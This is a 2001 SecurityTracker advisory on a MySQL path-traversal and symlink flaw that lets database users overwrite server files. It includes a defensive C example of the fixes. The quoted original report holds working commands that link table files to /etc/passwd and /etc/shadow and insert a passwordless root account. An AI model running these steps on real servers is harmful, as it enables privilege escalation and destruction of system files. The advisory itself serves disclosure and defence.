Re: MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
SecurityTracker Alert ID: 1001133
SecurityTracker URL: http://securitytracker.com/id/1001133
CVE Reference: GENERIC-MAP-NOMATCH
Date: Mar 21 2001
Impact:
Denial of service via local system, Modification of user information, User access via local system
Version(s): mysql-3.20.32a
Description:
It is reported that any local MySQL user can exploit MySQL to write files on the server with the privileges assigned to the MySQL server (which may be root-level privileges in some cases). The server accepts a database name such as '../../tmp' and maps it directly to a directory relative to its data directory, so tables created in that "database" are written outside the data directory. In addition, when mysqld checks whether a table already exists it looks only for tablename.frm, not for tablename.ISD or tablename.ISM; a user who first plants a symbolic link named tablename.ISD in the target directory can therefore have CREATE TABLE truncate, and INSERT write into, any file the server process is able to open. This can be used to gain additional access on the server.
A user reports that this vulnerability applies to mysql 3.23.32 [which is contrary to what the vendor has noted in a previous message].
This user tried the following commands:
mysql -u root ../../../../tmp
create table yikes(w int(4));
With these commands, the user was able to create:
/tmp/yikes.*
Impact:
An authorized MySQL user with local access can use the server to overwrite arbitrary files that the mysqld process is able to write, either to deny service or to obtain additional privileges. If the MySQL daemon is run as root, the user can obtain root-level privileges (the source report overwrites /etc/passwd and /etc/shadow).
Solution:
No solution was available at the time of this entry. The author of the original source report makes several recommendations:
1) Patch MySQL so that the table-existence check examines all three table files (tablename.ISD, tablename.ISM and tablename.frm), not only tablename.frm.
2) Patch MySQL to treat database names beginning with ".." as invalid database names.
3) Do not run the MySQL daemon as root; chown the existing database files to an unprivileged user and run mysqld as that user.
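As an added illustration of recommendations 1) and 2), and not code from MySQL or from the original report, the following stand-alone C functions show a database-name check that rejects traversal and a table-existence check that looks at all three table files with lstat(), so that a pre-planted symbolic link counts as "present" even before its target is touched. The function names, the 4096-byte path buffers and the scratch directory under /tmp are assumptions of this example; the name check is also stricter than the report's suggestion, rejecting path separators as well as any name beginning with "..".

```c
/* Added example, not MySQL source: the two checks recommended above,
 * written as small stand-alone functions. All names are hypothetical. */
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* The three files that make up an ISAM table in MySQL 3.2x. */
static const char *const TABLE_EXTS[] = { ".ISD", ".ISM", ".frm" };
#define N_EXTS (sizeof TABLE_EXTS / sizeof TABLE_EXTS[0])

/* Recommendation 2, generalised: a database name is a single directory
 * component under the data directory, so reject anything that could
 * walk out of it. Returns 1 if the name is acceptable, 0 otherwise. */
int valid_db_name(const char *name)
{
    size_t len;
    if (name == NULL || (len = strlen(name)) == 0 || len > 64)
        return 0;
    if (strcmp(name, ".") == 0 || strncmp(name, "..", 2) == 0)
        return 0;                        /* "..", "../tmp", "..foo" */
    if (strchr(name, '/') != NULL || strchr(name, '\\') != NULL)
        return 0;                        /* "x/../../tmp", Windows paths */
    return 1;
}

/* Build "<dir>/<table><ext>" into buf. Returns 0 on truncation. */
static int table_path(char *buf, size_t size, const char *dir,
                      const char *table, const char *ext)
{
    int n = snprintf(buf, size, "%s/%s%s", dir, table, ext);
    return n > 0 && (size_t)n < size;
}

/* The flawed check described in the report: only <table>.frm is examined,
 * so a pre-planted <table>.ISD symlink goes unnoticed. */
int frm_only_exists(const char *dir, const char *table)
{
    char path[4096];
    struct stat st;
    if (!table_path(path, sizeof path, dir, table, ".frm"))
        return 1;                        /* refuse if the path cannot be built */
    return stat(path, &st) == 0;
}

/* Recommendation 1: the table "exists" if *any* of its three files is
 * already present. lstat() is used so a symlink counts even when its
 * target does not exist (a dangling link planted by a user). */
int any_table_file_exists(const char *dir, const char *table)
{
    char path[4096];
    struct stat st;
    size_t i;
    for (i = 0; i < N_EXTS; i++) {
        if (!table_path(path, sizeof path, dir, table, TABLE_EXTS[i]))
            return 1;
        if (lstat(path, &st) == 0)
            return 1;
    }
    return 0;
}

/* Demonstration: plant the attacker's symlink from the report in a scratch
 * directory (assumed writable) and compare the two checks. Returns 1 when
 * the hardened check sees the link and the .frm-only check does not. */
int demo_symlink_detection(void)
{
    char dir[] = "/tmp/mysqlchk.XXXXXX";
    char lnk[4096];
    int caught = 0, missed = 0;

    if (mkdtemp(dir) == NULL)
        return 0;
    /* Attacker step: ln -s /etc/passwd gotcha.ISD (the target is not touched). */
    if (table_path(lnk, sizeof lnk, dir, "gotcha", ".ISD") &&
        symlink("/etc/passwd", lnk) == 0) {
        missed = !frm_only_exists(dir, "gotcha");      /* flaw: "no such table" */
        caught = any_table_file_exists(dir, "gotcha"); /* fix: "already exists" */
        unlink(lnk);
    }
    rmdir(dir);
    return caught && missed;
}

int main(void)
{
    printf("'../../tmp' accepted as database name: %d\n", valid_db_name("../../tmp"));
    printf("'test' accepted as database name: %d\n", valid_db_name("test"));
    printf("planted .ISD link caught by hardened check, missed by .frm-only check: %d\n",
           demo_symlink_detection());
    return 0;
}
```

The existence check is only half of the fix: once the table is known to be new, the server still has to open its files with O_EXCL (or equivalent) rather than O_TRUNC, otherwise a link planted between the check and the open is followed anyway.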
Vendor URL: mysql.com
Cause:
Input validation error, State error
Underlying OS:
Linux (Any), UNIX (FreeBSD), UNIX (Solaris - SunOS), Windows (NT), Windows (95), Windows (98), Windows (2000)
Message History:
This archive entry is a follow-up to the message listed below.
Source Message Contents
Date: Tue, 20 Mar 2001 12:02:58 +1100
Subject: Re: potential vulnerability of mysqld running with root
Works for mysql 3.23.32 running as root.
I used:
mysql -u root ../../../../tmp
create table yikes(w int(4));
This created /tmp/yikes.*
>>> "Pavlov, Lesha" <lesha@NN.RU> 19/3/01 4:32:37 am >>>
Anybody who gets a login and password to mysql can use it as a DoS or r00t
exploit, because mysql accepts '../blah-blah' as a valid database name, and
each table is represented by 3 files, tablename.ISD, tablename.ISM and
tablename.frm. But when mysqld checks whether a table already exists, it
checks _only_ tablename.frm:
Using these "vulnerable features of mysql" to make a big DoS (will
overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/overwrite qqq.ISD
# '../../tmp' is resolved relative to the mysqld data directory (here it lands in /var/tmp);
# the password must be attached to -p, a separate word would be taken as the database name
$ mysql -u user -h localhost -psomepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.
Usage as a r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -psomepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You get r00t now!
Recommendations:
* Patch mysql so that when it checks whether a table is present, it checks all
tablename.{ISD,ISM,frm} files, not only tablename.frm
* Patch mysql to treat database names starting with '..' as incorrect
database names.
* And the main recommendation - do not run mysqld as root!!!
Patches:
not yet
Workaround:
chown existing database tables to a normal user and run mysqld as this
unprivileged user - it will be a better solution!
Vulnerable versions:
This DoS/exploit was tested on mysql-3.20.32a but I see other versions of
mysql are also vulnerable.
Comments:
Mysql docs recommend not running mysqld as root, but people from RedHat
didn't read the mysql docs - mysql installed from rpm is vulnerable.